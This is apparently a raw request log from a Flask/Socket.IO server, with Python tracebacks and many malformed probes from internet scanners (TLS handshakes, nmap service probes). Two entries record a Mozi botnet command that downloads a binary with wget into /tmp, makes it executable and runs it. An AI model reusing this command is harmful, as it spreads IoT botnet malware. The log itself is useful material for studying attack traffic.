  File "/usr/local/lib/python3.10/dist-packages/engineio/base_server.py", line 229, in _get_socket
    raise KeyError('Session is disconnected')
KeyError: 'Session is disconnected'
5.8.11.202 - - [22/Nov/2024 19:15:17] code 400, message Bad request version ("¯nãY»bhlÿ(=':©\x82ÙoÈ¢×\x93\x98´ï\x80å¹\x90\x00(À")
206.168.34.127 - - [22/Nov/2024 20:42:12] code 505, message Invalid HTTP version (2.0)
167.99.143.69 - - [22/Nov/2024 21:29:02] code 400, message Bad request version ('À\x13À')
167.99.143.69 - - [22/Nov/2024 21:29:02] code 400, message Bad request version ('À\x13À')
167.99.143.69 - - [22/Nov/2024 21:29:03] code 400, message Bad request version ('À\x13À')
185.100.87.136 - - [22/Nov/2024 22:31:47] code 400, message Bad request version ('Ý%d1\x17¦%nÅ')
185.100.87.136 - - [22/Nov/2024 22:31:56] code 400, message Bad HTTP/0.9 request type ('\x10')
204.188.228.186 - - [22/Nov/2024 23:46:45] code 400, message Bad HTTP/0.9 request type ('\x16\x03\x01\x00{\x01\x00\x00w\x03\x03ÕÍëiÝG\x01ukÐ\x14z\x8eÈßf1ôúÀ«\x94*?øtK½î\x07eo\x00\x00\x1aÀ/À+À\x11À\x07À\x13À')
204.188.228.186 - - [22/Nov/2024 23:46:46] code 400, message Bad request syntax ('\x16\x03\x01\x00{\x01\x00\x00w\x03\x03~\x13z\x81\x92ÑqjèÖ')
152.42.214.50 - - [23/Nov/2024 00:02:51] code 400, message Bad request version ('À\x13À')
152.42.247.210 - - [23/Nov/2024 00:03:03] code 400, message Bad request version ('À\x13À')
66.175.213.4 - - [23/Nov/2024 00:32:54] code 400, message Bad request syntax ('\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03á\x12\x01Ì\x82ºëÁ¸ù')
46.101.167.144 - - [23/Nov/2024 04:30:25] code 400, message Bad request version ('À\x13À')
46.101.167.144 - - [23/Nov/2024 04:30:25] code 400, message Bad request version ('À\x13À')
46.101.167.144 - - [23/Nov/2024 04:30:26] code 400, message Bad request version ('À\x13À')
159.89.16.150 - - [23/Nov/2024 06:30:46] code 400, message Bad request version ('L0Çh&Ûb©\x14x®"¿\x05¡\x93\x9d\x96O\x84\x82¤[¸¯GeÁ\x0eW\x8aY\x00>\x13\x02\x13\x03\x13\x01À,À0\x00\x9fÌ©Ì¨ÌªÀ+À/\x00\x9eÀ$À(\x00kÀ#À\'\x00gÀ')
45.79.181.251 - - [23/Nov/2024 06:57:39] code 400, message Bad request syntax ('\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03óºqd!\x12´´')
154.213.184.23 - - [23/Nov/2024 07:08:32] code 400, message Bad request syntax ('\x05\x01\x00')
152.42.243.206 - - [23/Nov/2024 08:03:03] code 400, message Bad request version ('À\x13À')
152.42.243.111 - - [23/Nov/2024 08:03:05] code 400, message Bad request version ('î')
5.8.11.202 - - [23/Nov/2024 08:26:33] code 400, message Bad request version ("¯nãY»bhlÿ(=':©\x82ÙoÈ¢×\x93\x98´ï\x80å¹\x90\x00(À")
45.79.181.223 - - [23/Nov/2024 08:41:14] code 400, message Bad request version ('À\x13À')
154.213.184.23 - - [23/Nov/2024 08:44:36] code 400, message Bad request syntax ('\x04\x01\x01»-?(\x81\x00')
5.8.11.202 - - [23/Nov/2024 09:19:41] code 400, message Bad request version ("¯nãY»bhlÿ(=':©\x82ÙoÈ¢×\x93\x98´ï\x80å¹\x90\x00(À")
167.99.240.136 - - [23/Nov/2024 10:01:36] code 400, message Bad request version ('ËC\x07|Åt¢+í4\x02\x80')
137.184.150.245 - - [23/Nov/2024 10:14:38] code 400, message Bad request syntax ('\x00\x0e8\x01\x01\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00')
198.235.24.152 - - [23/Nov/2024 10:19:11] code 400, message Bad request version ('À\x13À')
198.235.24.152 - - [23/Nov/2024 10:19:11] code 400, message Bad request version ('À(À$À\x14À')
147.185.132.37 - - [23/Nov/2024 11:29:09] code 400, message Bad request version ('À\x13À')
147.185.132.37 - - [23/Nov/2024 11:29:09] code 400, message Bad request syntax ('\x16\x03\x01\x00Ê\x01\x00\x00Æ\x03\x03À')
93.174.93.12 - - [23/Nov/2024 15:48:13] code 400, message Bad request version ("¯nãY»bhlÿ(=':©\x82ÙoÈ¢×\x93\x98´ï\x80å¹\x90\x00(À")
152.42.243.206 - - [23/Nov/2024 16:03:03] code 400, message Bad request version ('À\x13À')
152.42.174.244 - - [23/Nov/2024 16:03:11] code 400, message Bad request version ('À\x13À')
52.160.32.228 - - [23/Nov/2024 18:55:53] code 400, message Bad request syntax ('MGLNDD_47.250.51.78_80')
78.153.140.151 - - [23/Nov/2024 19:43:43] code 400, message Bad request syntax ('\x16\x03\x01\x00¬\x01\x00\x00¨\x03\x03Yn\x83_Ô¨\x92\x8fÊ¼-\x1bÑ)¤\x16®¦6\x19\x99Bð{[Âð\x9e²Ißn\x00\x008À,À')
185.147.124.104 - - [23/Nov/2024 19:55:55] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
184.105.247.194 - - [23/Nov/2024 22:32:51] code 400, message Bad request version ('À\x14À')
152.42.243.111 - - [24/Nov/2024 00:03:04] code 400, message Bad request version ('À\x13À')
159.223.69.51 - - [24/Nov/2024 00:03:06] code 400, message Bad request version ('À\x13À')
5.8.11.202 - - [24/Nov/2024 00:11:39] code 400, message Bad request version ("¯nãY»bhlÿ(=':©\x82ÙoÈ¢×\x93\x98´ï\x80å¹\x90\x00(À")
93.174.93.12 - - [24/Nov/2024 01:46:48] code 400, message Bad request version ("¯nãY»bhlÿ(=':©\x82ÙoÈ¢×\x93\x98´ï\x80å¹\x90\x00(À")
45.79.181.179 - - [24/Nov/2024 02:02:51] code 400, message Bad request syntax ('\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03ÇUAo\x9cÊ\x92-ø\x14\x08')
167.94.145.100 - - [24/Nov/2024 02:49:34] code 505, message Invalid HTTP version (2.0)
202.112.238.240 - - [24/Nov/2024 04:12:09] code 400, message Bad request version ('À\x13À')
202.112.238.240 - - [24/Nov/2024 04:12:09] code 400, message Bad request version ('À\x13À')
47.103.155.228 - - [24/Nov/2024 04:23:21] code 400, message Bad request version ('RTSP/1.0')
47.103.155.228 - - [24/Nov/2024 04:23:28] code 400, message Bad HTTP/0.9 request type ('l\x00')
47.103.155.228 - - [24/Nov/2024 04:23:37] code 400, message Bad request version ('\x00\x01\x97|\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00')
47.103.155.228 - - [24/Nov/2024 04:23:43] code 400, message Bad HTTP/0.9 request type ('\x00')
47.103.155.228 - - [24/Nov/2024 04:23:49] code 400, message Bad HTTP/0.9 request type ('\x00')
47.103.155.228 - - [24/Nov/2024 04:23:49] code 400, message Bad request syntax ('EHLO')
47.103.155.228 - - [24/Nov/2024 04:23:51] code 400, message Bad request syntax ('HELP')
47.103.155.228 - - [24/Nov/2024 04:23:54] code 400, message Bad request syntax ('\x16\x03\x00\x00S\x01\x00\x00O\x03\x00?G×÷º,îê²`~ó\x00ý\x82{¹Õ\x96Èw\x9bæÄÛ<=Ûoï\x10n\x00\x00(\x00\x16\x00\x13\x00')
47.103.155.228 - - [24/Nov/2024 04:23:56] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00*%à\x00\x00\x00\x00\x00Cookie:')
47.103.155.228 - - [24/Nov/2024 04:23:59] code 400, message Bad request version ('\x00/\x00')
47.103.155.228 - - [24/Nov/2024 04:24:02] code 400, message Bad HTTP/0.9 request type ('\x80\x9e\x01\x03\x01\x00u\x00\x00\x00')
47.103.155.228 - - [24/Nov/2024 04:24:04] code 400, message Bad request syntax ('\x00\x00\x00qj\x81n0\x81k¡\x03\x02\x01\x05¢\x03\x02\x01')
47.103.155.228 - - [24/Nov/2024 04:24:12] code 400, message Bad request version ('0.12\x00')
47.103.155.228 - - [24/Nov/2024 04:24:13] code 400, message Bad request syntax ('\x01default')
47.103.155.228 - - [24/Nov/2024 04:24:15] code 400, message Bad request syntax ('0\x84\x00\x00\x00-\x02\x01\x07c\x84\x00\x00\x00$\x04\x00')
47.103.155.228 - - [24/Nov/2024 04:24:22] code 400, message Bad HTTP/0.9 request type ('0')
47.103.155.228 - - [24/Nov/2024 04:24:24] code 400, message Bad request version ('SIP/2.0')
47.103.155.228 - - [24/Nov/2024 04:24:31] code 400, message Bad request syntax ('TNMP\x04\x00\x00\x00TNME\x00\x00\x04\x00')
47.103.155.228 - - [24/Nov/2024 04:24:37] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00')
47.103.155.228 - - [24/Nov/2024 04:24:43] code 400, message Bad request syntax ('DmdT\x00\x00\x00\x17\x00\x00\x00\x01\x00\x00\x00\x00\x11\x11\x00ÿ\x01ÿ\x13')
47.103.155.228 - - [24/Nov/2024 04:24:49] code 400, message Bad HTTP/0.9 request type (':\x00\x00\x00/\x00\x00\x00\x02\x00\x00@\x02\x0f\x00\x01\x00=\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00/\x00\x00\x00\x00\x00\x00\x00\x00\x00@')
47.103.155.228 - - [24/Nov/2024 04:24:54] code 400, message Bad request syntax ('DIST00000001ARGC00000005ARGV00000002ccARGV00000002-cARGV00000006nmap.cARGV00000002-oARGV00000006nmap.oDOTI00000000')
47.103.155.228 - - [24/Nov/2024 04:24:59] code 400, message Bad request syntax ('JRMI\x00\x02K')
47.103.155.228 - - [24/Nov/2024 04:25:04] code 400, message Bad request syntax ('\x01\x00\x00\x00\x01\x00\x00\x00\x08\x08')
47.103.155.228 - - [24/Nov/2024 04:25:05] code 400, message Bad request version ('>')
47.103.155.228 - - [24/Nov/2024 04:25:10] code 400, message Bad request version ('\x00{\x000\x000\x000\x000\x00A\x00A\x000\x000\x00-\x000\x00A\x000\x000\x00-\x000\x000\x00a\x000\x00-\x00A\x00A\x000\x00A\x00-\x000\x000\x000\x000\x00A\x000\x00A\x00A\x000\x00A\x00A\x000\x00}\x00\x00\x00àmß_')
47.103.155.228 - - [24/Nov/2024 04:25:15] code 400, message Bad HTTP/0.9 request type ('\x00Z\x00\x00\x01\x00\x00\x00\x016\x01,\x00\x00\x08\x00\x7fÿ\x7f\x08\x00\x00\x00\x01\x00')
47.103.155.228 - - [24/Nov/2024 04:25:16] code 400, message Bad request syntax ('Subscribe')
47.103.155.228 - - [24/Nov/2024 04:25:16] code 400, message Bad request syntax ('Query')
47.103.155.228 - - [24/Nov/2024 04:25:17] code 400, message Bad request syntax ('\x05\x04\x00\x01\x02\x80\x05\x01\x00\x03')
47.103.155.228 - - [24/Nov/2024 04:25:23] code 400, message Bad request syntax ('\x04\x01\x00\x16\x7f\x00\x00\x01root\x00')
47.103.155.228 - - [24/Nov/2024 04:25:28] code 400, message Bad request version ('\x03\x00(\x00\x04ÿ\x08\x00\x01U\x00\x00\x00MSSQLServer\x00H\x0f\x00\x00')
47.103.155.228 - - [24/Nov/2024 04:25:28] code 400, message Bad request syntax ('HELP')
47.103.155.228 - - [24/Nov/2024 04:25:29] code 400, message Bad request syntax ('stats')
47.103.155.228 - - [24/Nov/2024 04:25:29] code 400, message Bad request version ('\x06\x00\x00\x00\x00\x00\x08\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\x00\x00\x00')
47.103.155.228 - - [24/Nov/2024 04:25:35] code 400, message Bad request version ('\x00\x00\x00\x04')
47.103.155.228 - - [24/Nov/2024 04:25:40] code 400, message Bad request version ('\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00ÿ\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ä\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f')
47.103.155.228 - - [24/Nov/2024 04:25:45] code 400, message Bad request version ('1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00')
47.103.155.228 - - [24/Nov/2024 04:25:46] code 400, message Bad HTTP/0.9 request type ('<\x00K\x00\x00\x00')
47.103.155.228 - - [24/Nov/2024 04:25:47] code 400, message Bad request syntax ('\x124\x00\x01')
47.103.155.228 - - [24/Nov/2024 04:25:52] code 400, message Bad request syntax ('\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x0f\x00')
47.103.155.228 - - [24/Nov/2024 04:25:52] code 400, message Bad request syntax ('serverstatus')
47.103.155.228 - - [24/Nov/2024 04:25:58] code 400, message Bad HTTP/0.9 request type ('Âååå\x9e')
47.103.155.228 - - [24/Nov/2024 04:25:58] code 400, message Bad request syntax ('#ST')
47.103.155.228 - - [24/Nov/2024 04:26:04] code 400, message Bad request version ('\x00\x00\x00\x03\x00\x05nmap\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00j\x00\x00\x00\x7f')
47.103.155.228 - - [24/Nov/2024 04:26:09] code 400, message Bad request syntax ('\x002Ð\x01\x00\x01\x00,\x10A\x00\x04\x11^\x00\x04\x11m\x00\x04\x11Z\x00\x18\x14\x04\x14\x03\x00\x07$\x07\x00\x08$\x0f\x00\x08\x14@\x00\x08\x14t\x00\x08\x00\x04\x11G')
47.103.155.228 - - [24/Nov/2024 04:26:09] code 400, message Bad HTTP/0.9 request type ('TSH')
47.103.155.228 - - [24/Nov/2024 04:26:15] code 400, message Bad request syntax ('A\x00\x00\x00:0\x00\x00ÿÿÿÿÔ\x07\x00\x00\x00\x00\x00\x00test.$cmd\x00\x00\x00\x00\x00ÿÿÿÿ\x1b\x00\x00\x00\x01serverStatus\x00\x00\x00\x00\x00\x00\x00ð?\x00')
47.103.155.228 - - [24/Nov/2024 04:26:16] code 400, message Bad request syntax ('*1')
47.103.155.228 - - [24/Nov/2024 04:26:21] code 400, message Bad request syntax ('\x00\x00\x00\x01\x07')
47.103.155.228 - - [24/Nov/2024 04:26:21] code 400, message Bad HTTP/0.9 request type ('show')
47.103.155.228 - - [24/Nov/2024 04:26:27] code 400, message Bad request syntax ('\x80\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15ðÑb\x00\x00\x00\x00\x00\x00\x00\x00')
47.103.155.228 - - [24/Nov/2024 04:26:32] code 400, message Bad request syntax ('\x00\x01n')
47.103.155.228 - - [24/Nov/2024 04:26:37] code 400, message Bad request syntax ('vp3')
47.103.155.228 - - [24/Nov/2024 04:26:43] code 400, message Bad request syntax ('\x94\x00ÍïÑa\x91\x03')
47.103.155.228 - - [24/Nov/2024 04:26:48] code 400, message Bad request syntax ('þ\x01')
47.103.155.228 - - [24/Nov/2024 04:26:54] code 400, message Bad request syntax ('\x00\x00\x07\x00\x08\x00\x03\x00\x04\x00\x05\x00\x06')
47.103.155.228 - - [24/Nov/2024 04:26:59] code 400, message Bad request syntax ('ÿû\x18ÿú\x18\x00IBM-3279-4-Eÿðÿû\x19ÿý\x19ÿû\x00ÿý\x00')
47.103.155.228 - - [24/Nov/2024 04:27:04] code 400, message Bad request syntax ('GIOP\x01\x00\x01\x00$\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00abcdef\x00\x00\x04\x00\x00\x00get\x00\x00\x00\x00\x00')
47.103.155.228 - - [24/Nov/2024 04:27:09] code 400, message Bad request syntax ('VERSION')
47.103.155.228 - - [24/Nov/2024 04:27:14] code 400, message Bad request syntax ('CNXN\x00\x00\x00\x01\x00\x10\x00\x00\x07\x00\x00\x002\x02\x00\x00¼±§±host::\x00')
47.103.155.228 - - [24/Nov/2024 04:27:20] code 400, message Bad HTTP/0.9 request type ('\x00\x00\x00\x10\x00\x00\x00')
47.103.155.228 - - [24/Nov/2024 04:27:25] code 400, message Bad request syntax ('\x0c\x00\x01\x00\x00\x00ImYorDad0u\x00\x00')
47.103.155.228 - - [24/Nov/2024 04:27:30] code 400, message Bad HTTP/0.9 request type ('ÚÚ\x01\x00\x00\x00\x14\x00\x10\x03\x08\x00\x00\x00')
47.103.155.228 - - [24/Nov/2024 04:27:30] code 400, message Bad request version ('\x00/\x00')
47.103.155.228 - - [24/Nov/2024 04:27:32] code 400, message Bad HTTP/0.9 request type ('t3')
47.103.155.228 - - [24/Nov/2024 04:27:55] code 400, message Bad request version ("øLÞ\x8b»y\x13dw\x1a\x00\x9c\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/À,À0\x00£\x00\x9fÌ©Ì¨ÌªÀ¯À\xadÀ£À\x9fÀ]ÀaÀWÀSÀ+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀRÀ$À(\x00k\x00jÀsÀw\x00Ä\x00ÃÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½À")
47.103.155.228 - - [24/Nov/2024 04:28:07] code 400, message Bad HTTP/0.9 request type ('\x80\x00\x00(/ïg\x7f\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86')
147.185.132.91 - - [24/Nov/2024 05:20:26] code 400, message Bad request version ('À\x13À')
147.185.132.91 - - [24/Nov/2024 05:20:26] code 400, message Bad request version ('À(À$À\x14À')
46.101.179.11 - - [24/Nov/2024 05:29:17] code 400, message Bad request syntax ('\x04\x01\x00P\x9fA\x02W\x00')
46.101.179.11 - - [24/Nov/2024 05:37:28] code 400, message Bad request syntax ('\x04\x01\x00P\x9fA\x02W\x00')
172.202.158.10 - - [24/Nov/2024 10:31:21] code 400, message Bad request syntax ('MGLNDD_47.250.51.78_80')
91.238.181.34 - - [24/Nov/2024 10:51:31] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
134.122.41.182 - - [24/Nov/2024 11:25:24] code 400, message Bad request syntax ('\x00\x0e8`\x9f\x9bldïà´\x00\x00\x00\x00\x00')
45.79.181.94 - - [24/Nov/2024 12:01:37] code 400, message Bad HTTP/0.9 request type ('\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03ò&è\x15\x10F\x94ÚÖÑç0ºUÈè\x1a³')
198.235.24.23 - - [24/Nov/2024 12:42:07] code 400, message Bad request version ('À\x13À')
198.235.24.23 - - [24/Nov/2024 12:42:07] code 400, message Bad request version ('À(À$À\x14À')
199.45.154.148 - - [24/Nov/2024 13:16:31] code 505, message Invalid HTTP version (2.0)
101.133.226.32 - - [24/Nov/2024 13:18:33] code 400, message Bad request version ("e(×Çõs8`\x81-\x94ò\x9f_\x9e®D%iÊ[Î0ù\x00>\x13\x02\x13\x03\x13\x01À,À0\x00\x9fÌ©Ì¨ÌªÀ+À/\x00\x9eÀ$À(\x00kÀ#À'\x00gÀ")
85.215.228.57 - - [24/Nov/2024 13:31:35] code 400, message Bad request syntax ('\x03\x00\x00\x13\x0eà\x00\x00\x00\x00\x00\x01\x00\x08\x00\x03\x00\x00\x00')
152.42.214.50 - - [24/Nov/2024 14:07:07] code 400, message Bad request version ('À\x13À')
152.42.243.206 - - [24/Nov/2024 14:07:11] code 400, message Bad request version ('À\x13À')
167.94.146.58 - - [24/Nov/2024 14:14:41] code 505, message Invalid HTTP version (2.0)
Traceback (most recent call last):
  File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1498, in __call__
    return self.wsgi_app(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/flask_socketio/__init__.py", line 43, in __call__
    return super(_SocketIOMiddleware, self).__call__(environ,
  File "/usr/local/lib/python3.10/dist-packages/engineio/middleware.py", line 63, in __call__
    return self.engineio_app.handle_request(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/socketio/server.py", line 433, in handle_request
    return self.eio.handle_request(environ, start_response)
  File "/usr/local/lib/python3.10/dist-packages/engineio/server.py", line 272, in handle_request
    socket = self._get_socket(sid)
  File "/usr/local/lib/python3.10/dist-packages/engineio/base_server.py", line 229, in _get_socket
    raise KeyError('Session is disconnected')
KeyError: 'Session is disconnected'
45.79.181.94 - - [24/Nov/2024 14:38:32] code 400, message Bad request version ('À\x13À')
101.133.138.230 - - [24/Nov/2024 14:51:25] code 400, message Bad request version ("\x06ñ¾\x81h\x89k\x81\x88\x11Êo\x80b\x00>\x13\x02\x13\x03\x13\x01À,À0\x00\x9fÌ©Ì¨ÌªÀ+À/\x00\x9eÀ$À(\x00kÀ#À'\x00gÀ")
185.147.124.104 - - [24/Nov/2024 16:39:55] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
178.128.54.126 - - [24/Nov/2024 16:53:46] code 400, message Bad request version ('À\x13À')
152.42.247.210 - - [24/Nov/2024 16:54:04] code 400, message Bad request version ('À\x13À')
5.8.11.202 - - [24/Nov/2024 16:58:37] code 400, message Bad request version ("¯nãY»bhlÿ(=':©\x82ÙoÈ¢×\x93\x98´ï\x80å¹\x90\x00(À")
134.122.48.83 - - [24/Nov/2024 20:14:56] code 400, message Bad request version ('À\x14À')
192.155.90.220 - - [24/Nov/2024 20:26:05] code 400, message Bad request version ('À\x13À')
64.62.197.16 - - [24/Nov/2024 21:50:31] code 400, message Bad request syntax ('\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x87j<¦;Í{æR}\x00+')
152.42.174.244 - - [25/Nov/2024 00:02:48] code 400, message Bad request version ('À\x13À')
159.223.67.34 - - [25/Nov/2024 00:02:50] code 400, message Bad request version ('À\x13À')
103.199.191.143 - - [25/Nov/2024 00:34:42] code 400, message Bad HTTP/0.9 request type ('27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$')
93.174.93.12 - - [25/Nov/2024 01:41:30] code 400, message Bad request version ("¯nãY»bhlÿ(=':©\x82ÙoÈ¢×\x93\x98´ï\x80å¹\x90\x00(À")
80.82.77.202 - - [25/Nov/2024 01:57:19] code 400, message Bad request version ("¯nãY»bhlÿ(=':©\x82ÙoÈ¢×\x93\x98´ï\x80å¹\x90\x00(À")
152.32.200.22 - - [25/Nov/2024 02:39:11] code 400, message Bad request version ('\x00\x9eÌ¨Ìª\x003\x00=\x00\x16À')
172.104.11.51 - - [25/Nov/2024 03:51:15] code 400, message Bad request version ('À\x13À')
185.91.127.43 - - [25/Nov/2024 06:01:42] code 400, message Bad request syntax ('\x05\x01\x00')
104.152.52.37 - - [25/Nov/2024 06:02:27] code 400, message Bad request version ('RTSP/1.0')
104.152.52.37 - - [25/Nov/2024 06:02:33] code 400, message Bad HTTP/0.9 request type ('l\x00')
104.152.52.37 - - [25/Nov/2024 06:02:39] code 400, message Bad request version ('\x00\x01\x97|\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00')
104.152.52.37 - - [25/Nov/2024 06:02:44] code 400, message Bad HTTP/0.9 request type ('\x00')
104.152.52.37 - - [25/Nov/2024 06:02:50] code 400, message Bad HTTP/0.9 request type ('\x00')
104.152.52.37 - - [25/Nov/2024 06:02:50] code 400, message Bad request syntax ('HELP')
104.152.52.37 - - [25/Nov/2024 06:02:50] code 400, message Bad request syntax ('\x16\x03\x00\x00S\x01\x00\x00O\x03\x00?G×÷º,îê²`~ó\x00ý\x82{¹Õ\x96Èw\x9bæÄÛ<=Ûoï\x10n\x00\x00(\x00\x16\x00\x13\x00')
104.152.52.37 - - [25/Nov/2024 06:02:51] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00*%à\x00\x00\x00\x00\x00Cookie:')
104.152.52.37 - - [25/Nov/2024 06:02:51] code 400, message Bad request version ('\x00/\x00')
104.152.52.37 - - [25/Nov/2024 06:02:52] code 400, message Bad request syntax ('\x00\x00\x00qj\x81n0\x81k¡\x03\x02\x01\x05¢\x03\x02\x01')
104.152.52.37 - - [25/Nov/2024 06:02:57] code 400, message Bad request version ('0.12\x00')
104.152.52.37 - - [25/Nov/2024 06:02:57] code 400, message Bad request syntax ('\x01default')
104.152.52.37 - - [25/Nov/2024 06:02:58] code 400, message Bad request syntax ('0\x84\x00\x00\x00-\x02\x01\x07c\x84\x00\x00\x00$\x04\x00')
104.152.52.37 - - [25/Nov/2024 06:03:03] code 400, message Bad HTTP/0.9 request type ('0')
172.104.11.51 - - [25/Nov/2024 06:42:48] code 400, message Bad request version ('Ù\x97')
103.42.243.3 - - [25/Nov/2024 07:03:53] code 400, message Bad HTTP/0.9 request type ('27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$')
5.8.11.202 - - [25/Nov/2024 07:58:25] code 400, message Bad request version ("¯nãY»bhlÿ(=':©\x82ÙoÈ¢×\x93\x98´ï\x80å¹\x90\x00(À")
152.42.214.50 - - [25/Nov/2024 08:02:37] code 400, message Bad request version ('\x9as?ß\x06fØ}')
159.223.69.51 - - [25/Nov/2024 08:02:48] code 400, message Bad request version ('À\x13À')
147.185.132.171 - - [25/Nov/2024 11:57:20] code 400, message Bad request syntax ('\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03N\x08C:¬ÆXj\x10\x9fà\x81\x8dÈOÅzz@,\x8e\x8cÄó·')
147.185.132.171 - - [25/Nov/2024 11:57:20] code 400, message Bad request version ('À(À$À\x14À')
205.210.31.147 - - [25/Nov/2024 12:15:18] code 400, message Bad request version ('À\x13À')
205.210.31.147 - - [25/Nov/2024 12:15:19] code 400, message Bad HTTP/0.9 request type ("\x16\x03\x01\x00Ê\x01\x00\x00Æ\x03\x03\x18\x95Üt\x06\x88=iê\x95\x15*õ2\x05T\\\x8b»õ\x83å=\x06k\x9e7,\x08/ù\x08\x00\x00hÌ\x14Ì\x13À/À+À0À,À\x11À\x07À'À#À\x13À")
5.8.11.202 - - [25/Nov/2024 12:24:16] code 400, message Bad request version ("¯nãY»bhlÿ(=':©\x82ÙoÈ¢×\x93\x98´ï\x80å¹\x90\x00(À")
80.66.76.121 - - [25/Nov/2024 14:05:46] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
80.82.77.202 - - [25/Nov/2024 14:15:49] code 400, message Bad request version ("¯nãY»bhlÿ(=':©\x82ÙoÈ¢×\x93\x98´ï\x80å¹\x90\x00(À")
152.42.247.210 - - [25/Nov/2024 16:03:01] code 400, message Bad request version ('À\x13À')
3.8.39.86 - - [25/Nov/2024 17:28:04] code 400, message Bad request version ('À\x14À')
3.8.39.86 - - [25/Nov/2024 17:30:10] code 400, message Bad request version ('À\x14À')
3.8.39.86 - - [25/Nov/2024 17:33:25] code 400, message Bad request syntax ('\x16\x03\x01\x00±\x01\x00\x00\xad\x03\x03k\x90³ô¿¦³')
3.8.39.86 - - [25/Nov/2024 17:38:21] code 400, message Bad request version ('À\x14À')
3.8.39.86 - - [25/Nov/2024 17:43:18] code 400, message Bad request version ('À\x14À')
3.8.39.86 - - [25/Nov/2024 17:48:53] code 400, message Bad request version ('À\x14À')
3.8.39.86 - - [25/Nov/2024 17:53:45] code 400, message Bad HTTP/0.9 request type ('\x16\x03\x01\x00±\x01\x00\x00\xad\x03\x03Jå-Ê\x8aè\x13c9¹\x04\x82Dª¼\x87mó.¼RC7\x9aîýã%Sí]?\x00\x00PÀ/À+À\x11À\x07À\x13À')
34.148.118.48 - - [25/Nov/2024 17:55:18] code 400, message Bad request version ('\x91#¦¹PõÙºíØ\x98Õ\x0f.\x19×\x89')
3.8.39.86 - - [25/Nov/2024 17:58:26] code 400, message Bad request version ('À\x14À')
3.8.39.86 - - [25/Nov/2024 18:03:31] code 400, message Bad request version ('À\x14À')
3.8.39.86 - - [25/Nov/2024 18:08:38] code 400, message Bad request version ('À\x14À')
3.8.39.86 - - [25/Nov/2024 18:13:56] code 400, message Bad request version ('À\x14À')
64.62.197.237 - - [25/Nov/2024 18:33:51] code 400, message Bad request version ('À\x14À')
93.174.93.12 - - [25/Nov/2024 21:07:59] code 400, message Bad request version ("¯nãY»bhlÿ(=':©\x82ÙoÈ¢×\x93\x98´ï\x80å¹\x90\x00(À")
162.142.125.208 - - [25/Nov/2024 23:34:57] code 505, message Invalid HTTP version (2.0)
159.223.69.51 - - [26/Nov/2024 00:02:51] code 400, message Bad HTTP/0.9 request type ('\x16\x03\x01\x01')
159.223.67.34 - - [26/Nov/2024 00:02:55] code 400, message Bad request version ('À\x13À')
192.155.90.118 - - [26/Nov/2024 00:13:04] code 400, message Bad request version ('\x9b7V4YË>ÛL\x11ûç')
Traceback (most recent call last):
